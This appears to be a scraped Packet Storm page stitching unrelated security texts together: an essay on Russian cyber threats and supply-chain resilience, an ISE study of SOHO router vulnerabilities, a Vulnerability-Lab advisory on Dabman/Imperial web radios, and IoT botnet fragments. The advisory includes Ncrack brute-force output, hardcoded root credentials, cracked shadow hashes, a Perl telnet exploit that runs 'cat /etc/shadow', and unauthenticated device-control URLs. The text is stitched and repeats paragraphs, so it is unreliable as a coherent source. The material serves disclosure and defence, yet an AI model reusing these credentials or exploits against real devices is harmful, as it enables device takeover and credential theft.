This is the Spamhaus Botnet Threat Update for Q1 2022. It shows a modest increase of 8% in the new number of botnet command and controllers.

![packet storm](https://packetstatic.com/img1514015884/ps_logo.png)

© 2022 Packet Storm. All rights reserved.

Spamhaus Botnet Threat Update Q1 2022

The ongoing war in Ukraine means that defenses are only as good and as strong as those with whom we partner.

Disinformation campaigns, distributed denial-of-service attacks, wiper malware, Internet blackouts, and bot armies are just a few of the various digital attacks that Russia has aimed at Ukraine. In late February, the Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) issued a joint advisory warning US firms to prepare their defenses to defend against these kinds of attacks. As of now, at least four different kinds of wiper malware — destructive disk-wiping malware — have been released during the conflict.

For those who are still wondering where is the cyberwar in the Russian invasion, it's already here and it's imperative for organizations across the globe to be prepared. However, in a tightly integrated global economy, these preparations must not occur in isolation but, rather, must encompass an organization's partners — and their partners' partners and so forth. Collective resilience captures this notion of strengthening the defenses across an organization's entire supply chain ecosystem by pursuing strength in unity, but viewed through a realistic lens, that self-preservation requires strengthening and lifting up the weakest links within highly interdependent systems. When it comes to the growing uncertainty and instability stemming from the Russian invasion, there has been a sharp swing toward collective resilience to proactively offset and mitigate the ongoing Russian malicious cyber activity.

Russian malware has a history of making organizations across the globe collateral damage, even if they are not the intended target. In 2017, a destructive supply chain attack propagated across the globe in a matter of hours. Maersk, Merck, and FedEx were just a few of the global victims, as the cyberattack disrupted ports, hindered vaccine distribution by the Centers for Disease Control and Prevention, and crippled manufacturing sales. This history, coupled with Russia's ongoing deployment of a range of malicious cyber activity during the fog of war, elevates the risk and potential for collateral damage across the globe due to cyberattacks. CISA's Shields Up campaign attests to the growing risk to organizations stemming from the Russian invasion.

**Third-Party Risks  
**However, Shields Up should not just apply to an organization's own systems but to its partners as well. Third-party risks remain a core attack vector targeting the weakest link within an organization's supply chain. More than 2,000 US-based firms had suppliers in Ukraine and Russia prior to the invasion; a number which exponentially increases to hundreds of thousands of suppliers when integrating their second- and third-tier suppliers. Even if these suppliers are not the intended targeted, they may become collateral damage in the war.

An organization's digital supply chain similarly must be part of this extended defense. Just as NotPetya exploited the digital supply chain, the US and UK have warned that the Russian-linked Cyclops Blink botnet is targeting ASUS, a Taiwanese electronics company. Coupled with the Lapsus$ Group's ongoing attacks, supply chain attacks remain on the rise and are a core component of Russia's strategy of preparatory installation and reconnaissance. The Cyclops Blink campaign has been active since at least 2019, illustrating Russia's ongoing efforts to embed and prepare for future exploitation. FBI Director Christopher Wray explained how cyberattacks do not occur instantaneously, but rather, "There's activity that leads up to it. ... There's developing access to those systems. So, there's a whole range of preparatory work, which is what we've been seeing." This access increasingly occurs through the digital supply chain.

**Collective Resilience  
**Furthermore, the growing list of approximately 400 sanctioned Russian companies introduces an additional cyber and supply chain risk for organizations. For instance, the March 24 US Department of Treasury sanction targets almost 50 Russian defense-industrial base organizations, including Joint Stock Company Russian Helicopters. This company alone has hundreds of tier-1 and tier-2 suppliers and is in the supply chain of many technology and aerospace and defense companies as it accounts for 10% of the global helicopter market. Many in the aerospace and defense sector rely on the same suppliers, exacerbating the potential for a single sanctioned company to propagate risk throughout the industry. 

These companies are not only at risk of noncompliance fines but need to consider the degree to which the hundreds of restricted companies have access to their data or networks. More sanctions are also likely, including secondary sanctions that target third-party relationships — a step that would yet again stress the necessity of collective resilience across an organization's entire supply chain.

Some are adhering to CISA's warnings and strengthening their own defenses, while others still debate the absence of malicious cyber activity in the Russian invasion. While fortunately there has yet to be the major attacks many feared, Russia continues "to undermine, coerce, and destabilize," according to Anne Neuberger, Deputy National Security Advisor for Cyber and Emerging Technology. As we've seen in the past, these destabilization efforts are unlikely to remain contained to Ukraine. Organizations should seek a collective resilience approach in preparation for the growing geopolitical instability across the globe. Defenses are only as good and as strong as those with whom we partner.

Strength in Unity: Why It's Especially Important to Strengthen Your Supply Chain Now

D-Link DIR-865L has SMB Symlink Traversal due to misconfiguration in the SMB service allowing symbolic links to be created to locations outside of the Samba share.

**Introduction**

ISE researchers have discovered critical security vulnerabilities in numerous small office/home office (SOHO) routers and wireless access points. We define a critical security vulnerability in a router as one that allows a remote attacker to take full control of the router's configuration settings, or one that allows a local attacker to bypass authentication and take control. This control allows an attacker to intercept and modify network traffic as it enters and leaves the network.

*   All 13 routers evaluated can be taken over from the local network
    *   4 of these attacks require no active management session.
*   11 of 13 routers evaluated can be taken over from the WAN
    *   2 of these attacks require no active management session.

**Motivation**

Despite being widely distributed and deployed in nearly every modern home and small office, SOHO networking equipment has received surprisingly little attention from security researchers. Yet, these devices facilitate the connectivity and protection (we hope) of millions of end-systems. The critical vulnerabilities that persist in these widely used devices demonstrate an urgent need for deeper scrutiny.

ISE initially set out to evaluate the security of ten popular, off-the-shelf SOHO wireless routers. The final scope of the research project was expanded to include thirteen unique devices. Our research indicates that a moderately skilled adversary with LAN or WLAN access can exploit all thirteen routers. We also found that nearly all devices had critical security vulnerabilities that could be exploited by a remote adversary, resulting in router compromise and unauthorized remote control. At least half of the routers that provided network attached storage (NAS) were found to be accessible by a remote adversary (full details will be disclosed in a future article).

We further categorize these remotely and locally accessible vulnerabilities by indicating their associated attack requirements:

*   Trivial attacks can be launched directly against the router with no human interaction or access to credentials.
*   Unauthenticated attacks require some form of human interaction, such as following a malicious link or browsing to an unsafe page, but do not require an active session or access to credentials.
*   Authenticated attacks require that the attacker have access to credentials (or that default router credentials are used—an all-too-common situation) or that a victim is logged in with an active session at the time of the attack.

We considered client-side attacks to be in scope, so long as they consist entirely of HTML and JavaScript code running in a web browser.

**Impact; new threats**

SOHO router vulnerabilities impact consumers in a number of ways that differ from the vulnerabilities that typically afflict end-systems, and through those vulnerabilities new threats arise. The number of parties affected by an individual or widespread router compromise is expanded, there could be lasting damage to users or soho networking device vendors, and detecting or recovering from an exploit of this type can be difficult.

**Affected parties: who is the victim?**

A typical end-system compromise pegs the end-user as the victim. Certainly, advanced threats leverage end-system compromise to gain a network foothold and attempt to compromise lateral systems, but in general there is one victim, and one party responsible for cleaning up the mess.

A SOHO router compromise not only affects that device, but the many end-systems it supports, the infrastructure of which it is a part, the community of sites visited by the end-users, and even the soho networking device vendor.

**Implications**

The impact of these routers' security flaws is exacerbated by the fact that unauthenticated attacks can target not only the administrator of a victim router's (W)LAN, but any user on the (W)LAN. A parent or child in the case of the home, any or all students behind a university router, or any guest or untrained user of a small office or enterprise network can be targeted and leveraged to gain full control of the SOHO networking device, which may also lead to additional attacks being launched against other users.

**Significance of compromise**

Once compromised, any router—SOHO or otherwise—may be used by an adversary to secure a man-in-the-middle position for launching more sophisticated attacks against all users in the router's domain. This includes sniffing and rerouting all non-SSL protected traffic, poisoning DNS resolvers, performing denial of service attacks, or impersonating servers. Worse still, is that these routers are also firewalls, and often represent the first (and last) line of defense for protecting the local network. Once compromised, the adversary has unfettered access to exploit the vulnerabilities of local area hosts that would be otherwise unreachable if the router were enforcing firewall rules as intended.

**Difficult Recovery; Persistent issue**

The overall community impact could be much worse. Considering that many soho networking device administrators are not computer or security savvy, default settings are undoubtedly prevalent. Even in the case where the vulnerabilities identified here and elsewhere are addressed by the vendor, it may not be reasonable to expect that SOHO networking device owners know about these issues, or will upgrade/patch their routers' firmware, which is the predominant distribution mechanism for SOHO networking device updates. In such cases, the vulnerabilities may remain unresolved indefinitely.

"Bricking" of SOHO networking devices could also become an issue due to the cumbersome and unauthenticated nature of the firmware upgrade process. As we've identified, in all routers evaluated a remote adversary can replace a vendor's firmware with their own. If such firmware were (intentionally) faulty, it could render a device unusable. The damage to users and vendors could be significant depending upon the number of devices in the field, the rate at which they can be compromised or "bricked," and the cost to replace or repair them.

**Large-scale threats**

So far we have acknowledged that users belonging to an affected router's domains are at risk, but if any ISP deploys a router at scale with these types of vulnerabilities—or has many customers using routers with these types of vulnerabilities—an adversary may leverage the vulnerabilities to directly attack the provider, core infrastructure, or other organizational targets, e.g., corporations and nation-states. This also presents a large surface for new botnet deployment or command and control (C2) strategies to facilitate DDoS attacks and cybercrime activities.

**Mitigations**

Unfortunately, there is little the average end-user can do to fully mitigate these attacks. Successful mitigation often requires a level of sophistication and skill beyond that of the average user (and beyond that of the most likely victims).

**Recommendations for Vendors**

SOHO networking device VENDORS should take the following actions to help mitigate these issues.

*   Prepare and make available firmware upgrades that address these issues.
*   Notify registered users of these vulnerabilities, and distribute instructions on how to upgrade device firmware.
*   Regularly audit devices for security vulnerabilities, produce and distribute security patches in a timely manner, and notify registered customers.

SOHO networking device VENDORS should incorporate the following design changes in to their product lines.

*   Using authenticated (digitally signed, and verifiable by the router) firmware updates.
*   Designing a method for automatic firmware updates, that can be opted out of by users.
*   Perform regular security audits to ensure devices are as hardened as possible.

**Recommendations for Device Administrators**

SOHO networking device ADMINISTRATORS should take the following actions to help mitigate these issues.

*   Upgrade your firmware regularly.
*   Disable (or do not enable) remote administration.
*   Disable (or do not enable) network services that are not utilized within the LAN, e.g., FTP, SMB, UPnP.
*   Log out from, and restart, your SOHO networking device after logging in for administrative tasks.
*   Clear browser cookies and active logins after logging out from your router.
*   Choose a non-standard (W)LAN IP address range (subnet), which will make generic automated attacks less effective against your network.
*   If possible, enable HTTPS for all administrative connections. For all of the routers we evaluated that had this feature, it was disabled by default.
*   Make sure your WLAN is protected using WPA2 encryption and is not left as an open WiFi network or protected with the outdated WPA or WEP standards.
*   ONLY install firmware from the router manufacturers website.
*   Choose a secure router administration password consisting of upper/lowercase alphanumeric and special characters that is at least 12 characters in length.
*   If your SOHO device is behind an additional firewall, restrict inbound access to this device from the greater WAN.

**Recommendations for End Users**

END-USERS behind SOHO networking devices should take the following actions to help mitigate these issues.

*   Do not discount browser or other software warnings of potential MITM attacks.
*   Do not follow links sent through email or by other means, especially ones that are directed to what could potentially be a SOHO networking device (e.g., 192.168.2.1).
*   Be diligent, and browse safely.

**Disclosures**

For all vulnerabilities identified in this research, ISE has disclosed the issues to the product vendors through their typical vulnerability reporting mechanism, as well as any other channels for which we had access. We've given what we believe is adequate time to address the issues disclosed, and to the extent it has been reasonable, we've helped those vendors develop or implement mitigations. We welcome all vendor feedback, and are happy to assist with any additional information that may facilitate a quick resolution to any of these vulnerabilities.

Beyond the vulnerabilities listed in this case study, our research has brought to light 17 issues that have received Common Vulnerabilities and Exposure (CVE) numbers, and 21 CVE submissions pending.

*   CVE-2013-0126: Cross-Site Request Forgery
*   CVE-2013-2644: FTP Directory Traversal
*   CVE-2013-2645: Cross-Site Request Forgery
*   CVE-2013-2646: Denial of Service
*   CVE-2013-3064: Unvalidated URL Redirect
*   CVE-2013-3065: DOM Cross-Site Scripting
*   CVE-2013-3066: Information Disclosure
*   CVE-2013-3067: Cross-Site Scripting
*   CVE-2013-3068: Cross-Site Request Forgery
*   CVE-2013-3069: Cross-Site Scripting
*   CVE-2013-3070: Information Disclosure
*   CVE-2013-3071: Authentication Bypass
*   CVE-2013-3072: Unauthenticated Hardware Linking
*   CVE-2013-3073: SMB Symlink Traversal
*   CVE-2013-3074: Media Server Denial of Service
*   CVE-2013-3083: Cross-Site Request Forgery
*   CVE-2013-3084: Cross-Site Scripting
*   CVE-2013-3085: Authentication Bypass
*   CVE-2013-3086: Cross-Site Request Forgery
*   CVE-2013-3087: Cross-Site Scripting
*   CVE-2013-3088: Authentication Bypass
*   CVE-2013-3089: Cross-Site Request Forgery
*   CVE-2013-3090: Cross-Site Scripting
*   CVE-2013-3091: Authentication Bypass
*   CVE-2013-3092: Failure to Validate HTTP Authorization Header
*   CVE-2013-3095: Cross-Site Request Forgery
*   CVE-2013-3096: Unauthenticated Hardware Linking
*   CVE-2013-3097: Cross-Site Scripting

**Related Work**

As stated earlier in this article, there has been little research published in the area of SOHO router security, however some interesting results have been disclosed by security researchers in recent years.

In March, 2013, Michael Messner disclosed vulnerabilities ranging from minor to critical in D-Link, TP-Link, Netgear, and Linksys routers. The vulnerabilities disclosed included authenticated and unauthenticated arbitrary command injection, information disclosure, unencrypted password storage, directory traversal, and persistent cross-site scripting.

In January, 2013, HD Moore disclosed that numerous home routers exposed UPnP services, including SSDP Discovery and SOAP, to the Internet (WAN) side of the device. This could lead to remote attackers modifying firewall rules or accessing private media files using DLNA. Worse, many of the UPnP implementations had numerous buffer overflow vulnerabilities.

Also in January, 2013, DefenseCode released an advisory describing a remote, unauthenticated format string vulnerability in the Broadcom UPnP software that escalated to root shell access.

At BlackHat 2012, Phil Purviance (Superevr) demonstrated a cross-site file upload vulnerability in the Linksys WRT54GL. In early 2013, Purviance researched the Linksys EA2700 and found numerous vulnerabilities, including cross-site scripting, directory and file traversal, unauthenticated password changes, and source code disclosure vulnerabilities.

In May, 2012, it was disclosed that WiFi Protected Setup (WPS) uses an eight-digit PIN for authentication, and an attacker can determine if the first four digits of an attempted PIN are correct, without regard to the last four. Worse, as this CERT vulnerability disclosed, many home routers fail to implement any rate limiting after successive incorrect PIN attempts.

At BlackHat 2009, Felix Lindner explored the feasibility and techniques that could be used to attack commercial grade routers. He found very few public vulnerabilities in this class of equipment.

**Future work**

Six months after releasing the advisories for the 13 routers, ISE will upgrade the firmware on all 13 routers and perform a reassessment to determine what—if any—impact deeper scrutiny from the security community has brought to the SOHO router industry. ISE may also expand the scope of the next study to include additional routers.

**Attribution and acknowledgments**

This research was conducted by Jacob Holcomb of Independent Security Evaluators and directed by Stephen Bono and Sam Small. Jacob Thomspon, Kedy Liu, Ali Jad Khalil, and Vincent Faires made additional contributions.

**References**

Messner, Michael. Multiple Vulnerabilities in D-Link DIR-600 and DIR-300. Revision B. February 2013.

Beardsley, Tom. Weekly Update: Consumer-Grade Hacking, Attribution and Testing, and Msfupdate updates. Rapid7 Metasploit Blog. March 28, 2013.

Moore, HD. Security Flaws in Universal Plug and Play. Rapid7, Inc., January 2013.

Broadcom UPnP Remote Preauth Code Execution Vulnerability. January 31, 2013.

Allar, Jared. WiFi Protected Setup (WPS) PIN brute force vulnerability. US CERT Vulnerability #723755. May 10, 2012.

Lindner, Felix. Router Exploitation. Black Hat 2009.

Purviance, Phil. Don't Use Linksys Routers. Superevr. April 5, 2013.

Mimoso, Michael. Serious Vulnerabilities Found in Popular Home Wireless Routers. threatpost. April 8, 2013

CVE-2013-4855: Exploiting SOHO Routers

TELESTAR Bobs Rock Radio, Dabman D10, Dabman i30 Stereo, Imperial i110, Imperial i150, Imperial i200, Imperial i200-cd, Imperial i400, Imperial i450, Imperial i500-bt, and Imperial i600 TN81HH96-g102h-g102 devices have insufficient access control for the /set_dname, /mylogo, /LocalPlay, /irdevice.xml, /Sendkey, /setvol, /hotkeylist, /init, /playlogo.jpg, /stop, /exit, /back, and /playinfo commands.

Document Title: =============== Dabman & Imperial (i&d) - Multiple Vulnerabilities References (Source): ==================== https://www.vulnerability-lab.com/get\_content.php?id=2183 Video: https://www.vulnerability-lab.com/get\_content.php?id=2190 Vulnerability Magazine: https://www.vulnerability-db.com/?q=articles/2019/09/09/imperial-dabman-internet-radio-undocumented-telnetd-code-execution http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13473 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13474 CVE-ID: ======= CVE-2019-13473 Release Date: ============= 2019-09-09 Vulnerability Laboratory ID (VL-ID): ==================================== 2183 Common Vulnerability Scoring System: ==================================== 9.9 Vulnerability Class: ==================== Multiple Current Estimated Price: ======================== 10.000€ - 25.000€ Product & Service Introduction: =============================== Since 1993, TELESTAR has been synonymous with quality and a very good price/performance ratio in the consumer electronics segment. TELESTAR-DIGITAL GmbH distributes high-quality reception technology for digital TV reception via satellite (DVB-S), cable (DVBC) or terrestrial (DVB-T) from its headquarters in the Vulkaneifel region of Germany. The product portfolio includes digital receivers and the latest generation of television sets as well as modern distribution and single-cable technology, satellite to IP reception solutions and radio transmission systems. The product range is rounded off by Germany's most comprehensive range of accessories for digital television reception. (Copy of the Homepage: https://www.xing.com/companies/telestar-digitalgmbh ) Abstract Advisory Information: ============================== The vulnerability laboratory research team discovered multiple vulnerabilities in the dabman and imperial web radio devices series (typ d & i). Vulnerability Disclosure Timeline: ================================== 2019-06-01: Researcher Notification & Coordination (Security Researcher) 2019-06-02: Vendor Notification (Telestar Digital Data Security Department) 2019-06-07: Vendor Response/Feedback (Telestar Digital Data Security Department) 2019-08-30: Vendor Fix/Patch (Service Developer Team) 2019-09-08: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Critical Authentication Type: ==================== Pre Auth (No Privileges or Session) User Interaction: ================= No User Interaction Disclosure Type: ================ Coordinated Disclosure Technical Details & Description: ================================ 1.1 The dabman and imperial manufactured web radio series (typ d & i) suffers from a weak password vulnerability. The vulnerabilites allows local and remote attackers to compromise the web radios full embedded linux busybox os. The vulnerability is located within an undocumented telnet service (telnetd) of the linux busybox and is turned permanently on. The telnetd service uses weak passwords with hardcoded credentials on the local embedded linux busybox of the internet radio devices. The telnet password can be cracked by usage of simple manual password bruteforce technics or by basic automated attacks with scripts (exp. ncrack). After receiving the password the remote or local network attacker can unauthorized login to the internet radio device to use the embedded linux busybox operating system. After the attacker has been logged in as root user, he can open the /etc/ path to cat gshadow, shadow and the conf files. At the end the attacker has finally full root access on the busybox (telnetd), he can access the web-server (httpd) as admin and see the wireless lan + unencrypted key in ./flash/ - wifi.cfg. A demo exploit poc is available in the wild. Due to some deeper researcher we identified also another manufacturer that uses the same typ of default manufactured system. The same undocumented telnet service was uncovered during the analysis. The manufacturer is still processing a patch. Vulnerable Protocol(s): \[+\] telnetd System(s): \[+\] BusyBox v1.15.2 (2014-05-05 23:37:21 CST) built-in shell (ash) (Debian Linux PreRelease - ARM 3.3.2) Firmware Version(s): \[+\] TN81HH96-g102h-g102 Manufacturer: Telestar Digital Gmbh Affected Version(s): \[+\] Bobs Rock Radio \[+\] Dabman D10 \[+\] Dabman i30 Stereo \[+\] Imperial i110 \[+\] Imperial i150 \[+\] Imperial i200 \[+\] Imperial i200-cd \[+\] Imperial i400 \[+\] Imperial i450 \[+\] Imperial i500-bt \[+\] Imperial i600 1.2 The dabman and imperial manufactured web radio series (typ d & i) suffers from a command execution vulnerability. The vulnerability allows local and remote attackers unauthorized and unauthenticated send commands to comprimise the web radio devices. The vulnerability is located httpd web-server communcation on port 80 and 8080. Local and remote attackers can send basic GET commands with basic command line tools (exp. curl or modhttp) to modify or manipulate http requests. The attacker can also capture the http airmusic commands to reverse engineer the radio device for unauthorized interactions. The system has no protection mechanism to block unauthorized transmit of commands. The web radio as well not owns an auth or reminder mechanism to ensure only allowed or trusted sources can transmit the commands (client, system, mac , auth ...). Vulnerable Protocol(s): \[+\] httpd Module(s): \[+\] UIData (Web UI on 80 or 8080) Function(s): \[+\] /set\_dname \[+\] /mylogo \[+\] /LocalPlay \[+\] /LocalPlay \[+\] /irdevice.xml \[+\] /Sendkey \[+\] /setvol \[+\] /hotkeylist \[+\] /init \[+\] /playlogo.jpg \[+\] /stop \[+\] /exit \[+\] /back \[+\] /playinfo Parameter(s): \[+\] ?name= \[+\] ?url=./\*.jpg \[+\] ?url=/stream.wav&name=\* \[+\] ?url=/msg.wav&save=\* \[+\] ?key=\* \[+\] ?vol=\*0&mute=\* \[+\] ?language=\* Affected Function(s): \[+\] Air Music Controls Manufacturer: Telestar Digital Gmbh Affected Version(s): \[+\] Bobs Rock Radio \[+\] Dabman D10 \[+\] Dabman i30 Stereo \[+\] Imperial i110 \[+\] Imperial i150 \[+\] Imperial i200 \[+\] Imperial i200-cd \[+\] Imperial i400 \[+\] Imperial i450 \[+\] Imperial i500-bt \[+\] Imperial i600 Proof of Concept (PoC): ======================= 1.1 Undocumented Telnet Service (telnetd) The security vulnerability can be exploited by local and remote attackers without user interaction or privileged user account. For security demonstration or to reproduce follow the provided information and steps below to continue. Nmap Portscan Scanning R-MAVERIC-EMAC\_1\_01\_018 (93.234.141.215) \[1000 ports\] Discovered open port 8080/tcp on 93.234.141.215 Discovered open port 80/tcp on 93.234.141.215 Discovered open port 23/tcp on 93.234.141.215 Completed SYN Stealth Scan at 14:48, 13.38s elapsed (1000 total ports) Initiating Service scan at 14:48 Scanning 3 services on R-MAVERIC-EMAC\_1\_01\_018 (93.234.141.215) Completed Service scan at 14:48, 6.20s elapsed (3 services on 1 host) Initiating OS detection (try #1) against R-MAVERIC-EMAC\_1\_01\_018 (93.234.141.215) NSE: Script scanning 93.234.141.215. Initiating NSE at 14:48 Completed NSE at 14:49, 30.61s elapsed Initiating NSE at 14:49 Completed NSE at 14:49, 0.00s elapsed Nmap scan report for R-MAVERIC-EMAC\_1\_01\_018 (93.234.141.215) Host is up (0.010s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 23/tcp open telnet security DVR telnetd (many brands) 80/tcp open tcpwrapped |\_http-title: AirMusic 8080/tcp open http BusyBox httpd 1.13 | http-methods: |\_ Supported Methods: GET |\_http-title: 404 Not Found MAC Address: 7C:C7:09:FD:3B:56 (Shenzhen Rf-link Technology) Device type: general purpose Running: Linux 2.6.X OS CPE: cpe:/o:linux:linux\_kernel:2.6 OS details: Linux 2.6.16 - 2.6.35 (embedded) Network Distance: 1 hop TCP Sequence Prediction: Difficulty=197 (Good luck!) IP ID Sequence Generation: All zeros Service Info: OS: Linux; CPE: cpe:/o:linux:linux\_kernel NCrack \[telnetd\] (ncrack -v --user root \[IP\]:\[PORT\]) C:Program Files (x86)Ncrack>ncrack -v --user root 93.234.141.215:23 Starting Ncrack 0.6 ( http://ncrack.org ) at 2019-06-29 18:21 Mitteleuropõische Sommerzeit Discovered credentials on telnet://93.234.141.215:23 'root' 'password' Discovered credentials on telnet://93.234.141.215:23 'root' 'password1' Discovered credentials on telnet://93.234.141.215:23 'root' 'password2' Discovered credentials on telnet://93.234.141.215:23 'root' 'password123' Discovered credentials on telnet://93.234.141.215:23 'root' 'password12' Discovered credentials on telnet://93.234.141.215:23 'root' 'password3' Discovered credentials on telnet://93.234.141.215:23 'root' 'password!' telnet://93.234.141.215:23 finished. Too many failed attemps. Discovered credentials for telnet on 93.234.141.215 23/tcp: 93.234.141.215 23/tcp telnet: 'root' 'password' 93.234.141.215 23/tcp telnet: 'root' 'password1' 93.234.141.215 23/tcp telnet: 'root' 'password2' 93.234.141.215 23/tcp telnet: 'root' 'password123' 93.234.141.215 23/tcp telnet: 'root' 'password12' 93.234.141.215 23/tcp telnet: 'root' 'password3' 93.234.141.215 23/tcp telnet: 'root' 'password!' Ncrack done: 1 service scanned in 273.29 seconds. Probes sent: 1117 | timed-out: 50 | prematurely-closed: 117 Ncrack finished. System: BusyBox v1.15.2 (2014-05-05 23:37:21 CST) built-in shell (ash) Kernel: 9)20151217\_M8\_TFT\_7601\_Kernel OS: CC: (GNU) 3.3.2 20031005 (Debian prerelease)GCC: (GNU) 4.2.1GCC: (GNU) 4.2.1GCC: (GNU) 4.2.1GCC: (GNU) 4.2.1GCC: (GNU) 4.2.1GCC: (GNU) 3.3.2 20031005 (Debian prerelease)Aaeabi.shstrtab.init.text.fini. rodata.ARM.extab.ARM.exidx.eh\_frame.init\_array. fini\_array.jcr.data.rel.ro.got.data.bss.comment.ARM.attributes Built-in commands: . : \[ \[\[ bg break cd chdir continue echo eval exec exit export false fg hash help jobs kill local printf pwd read readonly return set shift source test times trap true type ulimit umask unset wait Currently defined functions: \[, \[\[, ash, cat, chmod, cp, date, df, echo, free, ftpget, ftpput, gunzip, httpd, ifconfig, init, insmod, kill, killall, linuxrc, login, ls, lzmacat, mdev, mkdir, mount, mv, ping, ps, pwd, rm, rmmod, route, run-parts, sh, sleep, sync, tar, telnetd, test, top, true, udhcpc, udhcpd, umount, unlzma, usleep, zcat Username: root Password: password & password! shadow root:r.BF8RVw56BOA:1:0:99999:7::: (decrypted: password & mldonkey) ftp:!:0:::::: (decrypted: empty/blank) usb:w.rW11jv2dmM2:13941:::::: (decrypted: winbond) gshadow root:::root,mldonkey PoC: Exploit use Net::Telnet (); use Cwd; $file="inputLog.txt"; $ofile="outputlog.txt"; # For local network change to localhost or local ip @hosts = ("93.234.141.215"); foreach $hostip (sort @hosts) { $t = new Net::Telnet (Timeout => 10, Input\_log => $file, Prompt => "/>/"); print "nnConnecting to undocumented Telnet Service of Imperial or Dabman Web Radio Service: $hostip ...n"; print "nnAffected Models: Bobs Rock Radio, D10, i30, D30iS, i110, i150, i200, i200-cd, i400, i450, i500-bt, i600n"; $t->open("$hostip"); $t->login("root","password"); my @lines = $t->cmd('cat /etc/shadow'); print "$hostip: Directories:n"; print "@lines n"; $t->close; } 1.2 AirMusic Unauthenticated Command Execution (httpd) The security vulnerability can be exploited by local and remote attackers without user interaction or privileged user account. For security demonstration or to reproduce follow the provided information and steps below to continue. AirMusic Status Interface: http://93.234.141.215:80 Web-Server HTTPD UIData Path: http://93.234.141.215:8080 Note: Attacks can be performed in the local network (Localhost:80) or remotly by requesting the url remote ip adress (93.234.141.215) + forwarded remote port(Standard :23). Get device name from Device http://93.234.141.215:80/irdevice.xml Set device name http://93.234.141.215:80/set\_dname?name=PWND Set boot-logo (HTTP URL, requirement: JPG) http://93.234.141.215:80/mylogo?url=http://vulnerability-lab.com/pwnd.jpg Display or retrieve channel logo http://93.234.141.215:80:8080/playlogo.jpg Changing the main menu with the selected language http://93.234.141.215:80/init?language=us Play stream http://93.234.141.215:80/LocalPlay?url=http://vulnerability-lab.com/stream.wav&name=NAME Save audio file as message http://93.234.141.215:80/LocalPlay?url=http://vulnerability-lab.com/msg.wav&save=1 Recall channel hotkeys http://93.234.141.215:80/hotkeylist Current playback data http://93.234.141.215:80/playinfo Set volume from 0-31 & mute function http://93.234.141.215:80/setvol?vol=10&mute=0 Reset http://93.234.141.215:80/back Set stop http://93.234.141.215:80/stop Activate all back http://93.234.141.215:80/exit Send keystroke combo http://93.234.141.215:80/Sendkey?key=3 PoC: Exploit Dabman & Imerpial - HTML AutoPwner PoC: Checker for Modifications #!/usr/bin/perl use strict; use warnings; use LWP::Simple; my $url1 = 'http://93.234.141.215:80/'; my $source1 = get( $url1 ); my $url2 = 'http://93.234.141.215:80/'; my $source2 = get( $url2 ); print $source1; print $source1; Solution - Fix & Patch: ======================= A fresh updated version is available by the manufacturer telestar digital gmbh to resolve the vulnerabilities in all i & d series products. It is recommended to install the updates as quick as possible to ensure the digital security. Manual steps to update: 1. Set the device to the factory setting 2. Select language 3. Switch off the device 4. Switch on the device 5. Network setup 6. Wait for "New Software" message 7. Press OK to start the update 8. Updated Version: TN81HH96-g102h-g103\*\*a\*-fb21a-3624 Security Risk: ============== The security risk of the vulnerabilities in the online web radio with wifi and user interface are estimated as critical. The vulnerability can be exploited by local attackers in a network or by remote attackers without user interaction or further privileged user accounts. The potential of the issue being exploited in thousends of end user devices all over europe is estimated as high. The issue has the potential that could be used by remote attackers for spreading randomware / malware, mass defacements, compromises for further linux network attacks or being part of a criminal acting iot botnet. Credits & Authors: ================== Benjamin K.M. \[VULNERABILITY LAB - CORE RESEARCH TEAM\] - https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M. Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com Social: twitter.com/vuln\_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss\_upcoming.php vulnerability-lab.com/rss/rss\_news.php Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2019 | Vulnerability Laboratory - \[Evolution Security GmbH\]™

CVE-2019-13474: Dabman & Imerpial - HTML AutoPwner

Several sources estimate that by the year 2020 some 50 billion IoT devices will be deployed worldwide. IoT devices are purposefully designed to connect to a network and many are simply connected to the internet with little management or oversight. Such devices still must be identifiable, maintained, and monitored by security teams, especially in large complex enterprises.

Several sources estimate that by the year 2020 some 50 billion IoT devices will be deployed worldwide. IoT devices are purposefully designed to connect to a network and many are simply connected to the internet with little management or oversight. Such devices still must be identifiable, maintained, and monitored by security teams, especially in large complex enterprises. Some IoT devices may even communicate basic telemetry back to the device manufacturer or have means to receive software updates. In most cases however, the customers’ IT operation center don’t know they exist on the network.

In 2016, the Mirai botnet was discovered by the malware research group MalwareMustDie. The botnet initially consisted of IP cameras and basic home routers, two types of IoT devices commonly found in the household. As more variants of Mirai emerged, so did the list IoT devices it was targeting. The source code for the malware powering this botnet was eventually leaked online.

In 2018, hundreds of thousands of home and small business networking and storage devices were compromised and loaded with the so-called “VPN Filter” malware. The FBI has publicly attributed this activity to a nation-state actor and took subsequent actions to disrupt this botnet, although the devices would remain vulnerable to re-infection unless proper firmware or security controls were put in place by the user.

